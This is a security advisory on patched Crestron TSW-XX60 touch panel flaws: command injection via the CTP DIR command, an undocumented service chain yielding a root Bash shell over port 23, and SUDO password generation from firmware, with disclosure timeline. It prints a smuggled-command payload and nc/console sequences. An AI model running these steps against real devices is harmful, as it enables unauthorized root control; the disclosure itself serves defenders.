Crestron produces touchscreen devices, such as the TSW-XX60 series, which can be used to schedule meeting rooms in corporate offices. After the release of a recent device firmware update (which addressed several reported vulnerabilities), Security Compass is publishing the following security advisory.
Two remote code execution vulnerabilities and one elevation of privilege vulnerability were discovered and reported to Crestron by Security Compass’ Advisory team. The related technical details are now being disclosed, following Crestron’s latest patch that successfully remediated all reported issues.
The above vulnerabilities were reported to Crestron by Security Compass (Jackson Thuraisamy) in March 2018, and an active dialogue toward remediation continued until the release of patches in May 2018.
Unauthenticated Remote Code Execution via Command Injection in Crestron Terminal Protocol (CTP)
A command-injection vulnerability existed in the Crestron TSW-XX60 touch panels that could be exploited through the CTP administrative interface open on port 41795. This Telnet-like text console is used by the Crestron Toolbox software to manage the devices. This interface does not list commands that could be used to directly access the underlying Android OS.The CTP DIR command was vulnerable to command injection using a crafted command line payload with shell metacharacters. Output from the commands injected could be redirected into a text file on the device and read by adversaries.
The syntax of the DIR command allows a path to be specified:
In the back end, the command being executed in the Android system follows:
ls -le "/mnt/sdcard/ROMDISK/User/schedulingpanel"
An adversary could modify the query to execute a command, such as the following:
ls -le "/mnt/sdcard/ROMDISK/User"; whoami > "/mnt/sdcard/ROMDISK/output.txt"
The built-in TYPE command could then be used to read the standard output of the whoami command:
The base /mnt/sdcard/ROMDISK path could be discovered using built-in CTP commands
Unauthenticated Remote Code Execution via Bash Shell Service in Crestron Terminal Protocol (CTP)
The Crestron TSW-XX60 panels have an administrative interface open on port 41795 (Crestron Terminal Protocol). This Telnet-like text console is used by the Crestron Toolbox software to manage the touch panel devices. This interface does not list commands that could be used to directly access the underlying Android OS.
Two conditions existed on the touch panel device that allowed an adversary to gain remote code execution:
- A system service, called telnetd_debug, was capable of binding to a Bash shell on port 23 (this service is disabled by default).
- An undocumented administrative command (RESTARTSERVICE) could be used to start services.
These conditions could be leveraged by disabling the running telnetd service with the TELNETPORT OFF command and then starting the telnet_debug service with the RESTARTSERVICE command. When this chain of tasks was performed, an interactive shell could be obtained with the ability to run arbitrary system commands on the device. If the user does not have administrative privileges to use a terminal command, they could leverage the built-in SUDO command to elevate to root privileges (see CVE-2018-13341 below).
The Crestron Toolbox Protocol can be connected to by accessing port 41795 on the TSW-XX60 device. The user would be met with a command line interface.
[email protected]:~$ nc -C 10.60.129.115 41795
TSW-760 Control Console
Telnet Port: On
The user could then disable the running Telnet service and start the telnetd_debug service.
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> RESTARTSERVICE telnetd_debug
Service telnetd_debug restarted
The telnetd_debug service could then be connected to by accessing port 23. In response, the user received an interactive Bash shell with which commands could be run on the target device as the current running user (i.e. root).
[email protected]:~$ nc -C 10.60.129.115 23
bash-3.2# uname -a
Linux TSW760 3.10.33 #3 SMP PREEMPT Mon Nov 6 16:52:32 EST 2017 armv7l GNU/Linux
Elevation of Privilege in Crestron Terminal Protocol
Crestron TSW-XX60 touch panel devices were affected by a privilege-escalation vulnerability that could be exploited through access to administrative credentials in the device firmware. If an adversary gained access to system binaries (e.g. by obtaining the firmware), they could leverage the “supwdgenerator” binary to generate administrative passwords for the built-in SUDO command.
This command allowed lower-privileged users to provide credentials that enabled them to run Crestron Terminal Protocol (CTP) commands as an administrator after authentication. After inspecting the device firmware and generating the correct passwords, an adversary could execute commands on the device as an administrator.
The HELP documentation in CTP provided information about commands and the privilege required to execute them. As shown below, the supported user roles are Administrator, Programmer, and Operator.
TSW-760> HELP ALL
GETANALOGJOIN Programmer Get a analog join value
GETAUDITLOG Administrator Retrieve the audit log.
GETDIGITALJOIN Programmer Get a digital join value
GETPAsswordrule Administrator Display password rules
GETSERIALJOIN Programmer Get a serial join value
PING Operator Ping remote node
POEPLUS Programmer Enable/disable 24V
PRINTAUDITLOG Administrator Print the audit log.
PROJECTREFresh Administrator Sets time to Refresh project.
PROJECTRESTART Programmer Restart the user project.
One of the commands (SUDO) allowed a lower-privileged user to run commands as an Administrator. This was done by authenticating with a username and password.
SUDO cmd [param1 param2 ...]
cmd: command to execute.
param1,param2,…: parameters for the command.
TSW-760> SUDO DIR
Invalid user name or password..
Firmware analysis indicated that two additional usernames (crengsuperuser and crsuperuser) were supported, and their passwords were derived from the MAC address of the Ethernet adapter.
An adversary with access to the supwdgenerator application could run it with the command line used by the ctpd application. An example follows:
[email protected]:~$ ./supwdgenerator AA.BB.CC.DD.EE.FF -ForEngineerOnly wDyB[redacted]A8
The adversary could then use the password to authenticate with the SUDO command, as shown below:
TSW-760> SUDO DIR
[DIR] 02–07–18 11:27:41 ROMDISK
[DIR] 09–29–17 18:07:06 SSHBanner
[DIR] 02–07–18 11:21:16 SYS
- Following Security Compass’s responsible disclosure process, Crestron PSIRT was notified of the vulnerabilities on March 9, 2018.
- A response was promptly received from Crestron that they were investigating the matter with their engineering team.
- Crestron acknowledged that the vulnerabilities were true positives and that they were investigating remediation.
- A general release patch was available on May 30, 2018.
To learn more about Security Compass’ Verification Services, read about them here: https://www.securitycompass.com/advisory/services/verification/.